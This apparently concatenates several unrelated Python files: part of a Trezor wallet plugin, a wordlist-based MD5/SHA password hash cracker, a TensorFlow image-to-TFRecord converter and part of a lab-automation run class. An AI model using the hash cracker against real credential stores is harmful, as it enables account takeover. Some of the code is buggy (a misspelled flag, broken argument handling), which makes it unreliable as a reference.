client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey('standard', bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address.to_ui_string()[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address.to_string(address.FMT_LEGACY)
outputs.append(txoutputtype)
return outputs
def electroncash_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electroncash_tx_to_txtype(tx)
|
HashCracker.py | import hashlib
import threading
import queue
import time
def info():
info = {
'name': 'hash',
'path': 'HashCracker',
'fullname': 'SWEP HASH CRACKER',
'description': 'Hash cracker. Supports md5 and all sha types.',
'parameters':{
'Hash': 'Hash to crack',
'mode': 'Hash mode',
'FileName': 'Wordlist name.',
'Thread': 'Threads. Default: 10'
},
'author': 'BREACHERS security',
'date': '2019-01-26'
}
return info
class Scanner():
def __init__(self):
self.TaskList = []
self.Thread = 10
self.Queue = queue.Queue()
self.Hash = None
self.Status = False
self.PlainText = ''
self.mode = 'md5'
self.FileName = '/home/nimda/swep/WordLists/100000.txt'
pass
def CrackHash(self, **hash):
if not hash:
if not self.Hash:
print '[!] Hash not specified.'
return
else:
self.Hash = hash[0]
fp = open(self.FileName, 'r+')
for item in fp.read().split('\n'):
self.Queue.put(item)
self.Status = True
threadchecker = threading.Thread(target=self._ThreadChecker)
threadchecker.setDaemon(True)
threadchecker.start()
if self.mode == 'md5': # Duplicate but good for efficiency.
while len(self.TaskList) or self.Queue.qsize():
if len(self.TaskList) < self.Thread:
thread = threading.Thread(target=self._Md5HashCracker, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing thread.'
for item in self.TaskList:
item.join()
break
elif self.mode == 'sha1':
while len(self.TaskList) or self.Queue.qsize():
if len(self.TaskList) < self.Thread:
thread = threading.Thread(target=self._Sha1HashCracker, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing thread.'
for item in self.TaskList:
item.join()
break
elif self.mode == 'sha224':
while len(self.TaskList) or self.Queue.qsize():
if len(self.TaskList) < self.Thread:
thread = threading.Thread(target=self._Sha224HashCracker, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing thread.'
for item in self.TaskList:
item.join()
break
elif self.mode == 'sha256':
while len(self.TaskList) or self.Queue.qsize():
if len(self.TaskList) < self.Thread:
thread = threading.Thread(target=self._Sha256HashCracker, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing thread.'
for item in self.TaskList:
item.join()
break
elif self.mode == 'sha384':
while len(self.TaskList) or self.Queue.qsize():
if len(self.TaskList) < self.Thread:
thread = threading.Thread(target=self._Sha384HashCracker, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing thread.'
for item in self.TaskList:
item.join()
break
elif self.mode == 'sha512':
while len(self.TaskList) or self.Queue.qsize():
if len(self.TaskList) < self.Thread:
thread = threading.Thread(target=self._Sha512HashCracker, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print '[*] Scan completed, synchronizing thread.'
for item in self.TaskList:
item.join()
break
else:
print '[!] Invalid hash type. Support type: md5, sha1|224|256|384|512.'
self.Status = False
if self.PlainText:
print '[+] Password found: %s' % (self.PlainText)
return self.PlainText
else:
print '[*] Hash not found.'
return
def _Md5HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.md5(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha1HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha1(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha224HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha224(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha256HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha256(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha384HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha384(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _Sha512HashCracker(self, plaintext):
print '[*] Checking %s' %(plaintext)
if hashlib.sha512(plaintext).hexdigest() == self.Hash:
self.Status = False
self.PlainText = plaintext
return
def _ThreadChecker(self):
time.sleep(1)
while self.Status:
for item in self.TaskList:
if not item.isAlive():
self.TaskList.remove(item)
del item
return
def GetPlaintext(self, mode, digit): # todo: list generation
list = []
CharList = ['a', 'b', 'c', 'd', 'e' ,'f', 'g', 'h', 'i' ,'j', 'k', 'l' ,'m', 'n', 'o' ,'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
NumList = [1,2,3,4,5,6,7,8,9,10]
if mode == 'a-z':
for i in range(digit):
for i in CharList:
pass
def info(self):
InformationList = info()
args = InformationList['parameters']
print '[*] Incoming scanner information:'
print '[*] Scanner name: %s' %(InformationList['name'])
print ' | %s' %(InformationList['fullname'])
print ' | Description: %s' %(InformationList['description'])
print ' | Author: %s' %(InformationList['author'])
print ' | Date: %s' %(InformationList['date'])
print ' | Arguments: Total %i' %(len(args))
print ' | | NAME DESCRIPTION'
print ' | | ---- `-----------'
for item in args.keys():
print ' | | %s%s' %(item.ljust(12), args[item])
print ' |'
print '[*] Scanner information end.'
def test():
scanner = Scanner()
scanner.Hash = '42995f342e8abd019311aaed89d550ae'
scanner.mode = 'md5'
scanner.FileName = '/home/nimda/swep/WordLists/TestDict'
scanner.CrackHash()
|
build_image_data.py | """Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If you data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', 'D:\\Robots\\Fruit-Images-Dataset\\Training',
'Training data directory')
tf.app.flags.DEFINE_string('test_directory', 'D:\\Robots\\Fruit-Images-Dataset\\Test',
'Test data directory')
tf.app.flags.DEFINE_string('output_directory', 'D:\\Robots\\',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('test_shards', 1,
'Number of shards in test TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 1,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', './labels', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'height': _int64_feature(height),
'width': _int64_feature(width),
'label': _int64_feature(label),
'image_raw': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.test_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.test_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('test', FLAGS.test_diectory,
FLAGS.test_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
automated_run.py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# # ============= enthought library imports =======================
import ast
import os
import re
import time
import weakref
from pprint import pformat
from threading import Thread, Event as TEvent
from numpy import Inf, polyfit, linspace, polyval
from traits.api import Any, Str, List, Property, \
Event, Instance, Bool, HasTraits, Float, Int, Long, Tuple, Dict
from traits.trait_errors import TraitError
from pychron.core.helpers.filetools import add_extension
from pychron.core.helpers.filetools import get_path
from pychron.core.helpers.iterfuncs import groupby_key
from pychron.core.helpers.strtools import to_bool
from pychron.core.ui.preference_binding import set_preference
from pychron.core.yaml import yload
from pychron.experiment import ExtractionException
from pychron.experiment.automated_run.hop_util import parse_hops
from pychron.experiment.automated_run.persistence_spec import PersistenceSpec
from pychron.experiment.conditional.conditional import TruncationConditional, \
ActionConditional, TerminationConditional, conditional_from_dict, CancelationConditional, conditionals_from_file, \
QueueModificationConditional
from pychron.experiment.utilities.conditionals import test_queue_conditionals_name, QUEUE, SYSTEM, RUN
from pychron.experiment.utilities.environmentals import set_environmentals
from pychron.experiment.utilities.identifier import convert_identifier
from pychron.experiment.utilities.script import assemble_script_blob
from pychron.globals import globalv
from pychron.loggable import Loggable
from pychron.paths import paths
from pychron.pychron_constants import NULL_STR, MEASUREMENT_COLOR, \
EXTRACTION_COLOR, SCRIPT_KEYS, AR_AR, NO_BLANK_CORRECT, EXTRACTION, MEASUREMENT, EM_SCRIPT_KEYS, SCRIPT_NAMES, \
POST_MEASUREMENT, POST_EQUILIBRATION
from pychron.spectrometer.base_spectrometer import NoIntensityChange
DEBUG = False
class ScriptInfo(HasTraits):
measurement_script_name = Str
extraction_script_name = Str
post_measurement_script_name = Str
post_equilibration_script_name = Str
SCRIPTS = {}
WARNED_SCRIPTS = []
class AutomatedRun(Loggable):
"""
The ``AutomatedRun`` object is used to execute automated analyses.
It mostly delegates responisbility to other objects.
It provides an interface for ``MeasurementPyscripts``.
All measurement script commands have a corresponding function defined here.
A commands corresponding function is defined as py_{function_name}
for example ``position_magnet`` calls ``AutomatedRun.py_position_magnet``
data collection is handled by either ``MultiCollector`` or ``PeakHopCollector``
persistence (saving to file and database) is handled by ``AutomatedRunPersister``
An automated run is executed in four steps by the ``ExperimentExecutor``.
#. start
#. extraction
#. measurement
a. equilibration
b. post_equilibration
#. post_measurement
equilibration and post_equilibration are executed concurrently with the measurement script
this way equilibration gas can be measured.
four pyscripts (all optional) are used to program analysis execution
1. extraction
2. measurement
3. post_equilibration
4. post_measurement
four types of conditionals are available
1. termination_conditionals
2. truncation_conditionals
3. action_conditionals
4. cancelation_conditionals
"""
spectrometer_manager = Any
extraction_line_manager = Any
# experiment_executor = Any
ion_optics_manager = Any
multi_collector = Instance('pychron.experiment.automated_run.multi_collector.MultiCollector')
peak_hop_collector = Instance('pychron.experiment.automated_run.peak_hop_collector.PeakHopCollector')
persister = Instance('pychron.experiment.automated_run.persistence.AutomatedRunPersister', ())
dvc_persister = Instance('pychron.dvc.dvc_persister.DVCPersister')
labspy_client = Instance('pychron.labspy.client.LabspyClient')
xls_persister = Instance('pychron.experiment.automated_run.persistence.ExcelPersister')
collector = Property
script_info = Instance(ScriptInfo, ())
runner = Any
monitor = Any
plot_panel = Any
isotope_group = Instance('pychron.processing.isotope_group.IsotopeGroup')
spec = Any
runid = Str
uuid = Str
analysis_id = Long
fits = List
eqtime = Float
use_syn_extraction = Bool(False)
is_first = Bool(False)
is_last = Bool(False)
is_peak_hop = Bool(False)
truncated = Bool
measuring = Bool(False)
dirty = Bool(False)
update = Event
use_db_persistence = Bool(True)
use_dvc_persistence = Bool(False)
use_xls_persistence = Bool(False)
measurement_script = Instance('pychron.pyscripts.measurement_pyscript.MeasurementPyScript')
post_measurement_script = Instance('pychron.pyscripts.extraction_line_pyscript.ExtractionPyScript')
post_equilibration_script = Instance('pychron.pyscripts.extraction_line_pyscript.ExtractionPyScript')
extraction_script = Instance('pychron.pyscripts.extraction_line_pyscript.ExtractionPyScript')
termination_conditionals = List
truncation_conditionals = List
action_conditionals = List
cancelation_conditionals = List
modification_conditionals = List
tripped_conditional = Instance('pychron.experiment.conditional.conditional.BaseConditional')
peak_center = None
coincidence_scan = None
info_color = None
signal_color = None
baseline_color = None
executor_event = Event
ms_pumptime_start = None
previous_blanks = Tuple
previous_baselines = Dict
_active_detectors = List
_peak_center_detectors = List
_loaded = False
_measured = False
_aborted = False
_alive = Bool(False)
_truncate_signal = Bool
_equilibration_done = False
_integration_seconds = Float(1.1)
min_ms_pumptime = Int(60)
overlap_evt = None
use_peak_center_threshold = Bool
peak_center_threshold = Float(3)
peak_center_threshold_window = Int(10)
persistence_spec = Instance(PersistenceSpec)
experiment_type = Str(AR_AR)
laboratory = Str
instrument_name = Str
intensity_scalar = Float
_intensities = None
log_path = Str
failed_intensity_count_threshold = Int(3)
use_equilibration_analysis = Bool(False)
def set_preferences(self, preferences):
self.debug('set preferences')
for attr, cast in (('experiment_type', str),
('laboratory', str),
('instrument_name', str),
('use_equilibration_analysis', to_bool),
('use_peak_center_threshold', to_bool),
('peak_center_threshold', float),
('peak_center_threshold_window', int),
('failed_intensity_count_threshold', int)):
set_preference(preferences, self, attr, 'pychron.experiment.{}'.format(attr), cast)
for p in (self.persister, self.xls_persister, self.dvc_persister):
if p is not None:
p.set_preferences(preferences)
self.multi_collector.console_set_preferences(preferences, 'pychron.experiment')
self.peak_hop_collector.console_set_preferences(preferences, 'pychron.experiment')
# ===============================================================================
# pyscript interface
# ===============================================================================
def py_get_intensity(self, detector):
if self._intensities:
try:
idx = self._intensities['tags'].index(detector)
except ValueError:
return
return self._intensities['signals'][idx]
def py_set_intensity_scalar(self, v):
self.intensity_scalar = v
return True
def py_set_isotope_group(self, name):
if self.plot_panel:
self.plot_panel.add_isotope_graph(name)
def py_generate_ic_mftable(self, detectors, refiso, peak_center_config=None, n=1):
return self._generate_ic_mftable(detectors, refiso, peak_center_config, n)
def py_whiff(self, ncounts, conditionals, starttime, starttime_offset, series=0, fit_series=0):
return self._whiff(ncounts, conditionals, starttime, starttime_offset, series, fit_series)
def py_reset_data(self):
self.debug('reset data')
self._persister_action('pre_measurement_save')
def py_send_spectrometer_configuration(self):
self.spectrometer_manager.spectrometer.send_configuration()
self.spectrometer_manager.spectrometer.clear_cached_config()
def py_reload_mftable(self):
self.spectrometer_manager.spectrometer.reload_mftable()
def py_set_integration_time(self, v):
self.set_integration_time(v)
def py_is_last_run(self):
return self.is_last
def py_define_detectors(self, isotope, det):
self._define_detectors(isotope, det)
def py_position_hv(self, pos, detector):
self._set_hv_position(pos, detector)
def py_position_magnet(self, pos, detector, use_dac=False, for_collection=True):
if not self._alive:
return
self._set_magnet_position(pos, detector, use_dac=use_dac, for_collection=for_collection)
def py_activate_detectors(self, dets, peak_center=False):
if not self._alive:
return
if not self.spectrometer_manager:
self.warning('no spectrometer manager')
return
if peak_center:
self._peak_center_detectors = self._set_active_detectors(dets)
else:
self._activate_detectors(dets)
def py_set_fits(self, fits):
isotopes = self.isotope_group.isotopes
if not fits:
fits = self._get_default_fits()
elif len(fits) == 1:
fits = {i: fits for i in isotopes}
else:
fits = dict([f.split(':') for f in fits])
g = self.plot_panel.isotope_graph
for k, iso in isotopes.items():
try:
fi = fits[k]
except KeyError:
try:
fi = fits[iso.name]
except KeyError:
try:
fi = fits['{}{}'.format(iso.name, iso.detector)]
except KeyError:
fi = 'linear'
self.warning('No fit for "{}". defaulting to {}. '
'check the measurement script "{}"'.format(k, fi, self.measurement_script.name))
iso.set_fit_blocks(fi)
self.debug('set "{}" to "{}"'.format(k, fi))
idx = self._get_plot_id_by_ytitle(g, k, iso)
if idx is not None:
g.set_regressor(iso.regressor, idx)
def py_set_baseline_fits(self, fits):
if not fits:
fits = self._get_default_fits(is_baseline=True)
elif len(fits) == 1:
fits = {i.detector: fits[0] for i in self.isotope_group.values()}
elif isinstance(fits, str):
fits = {i.detector: fits for i in self.isotope_group.values()}
else:
fits = dict([f.split(':') for f in fits])
for k, iso in self.isotope_group.items():
try:
fi = fits[iso.detector]
except KeyError:
fi = ('average', 'SEM')
self.warning('No fit for "{}". defaulting to {}. '
'check the measurement script "{}"'.format(iso.detector, fi, self.measurement_script.name))
iso.baseline.set_fit_blocks(fi)
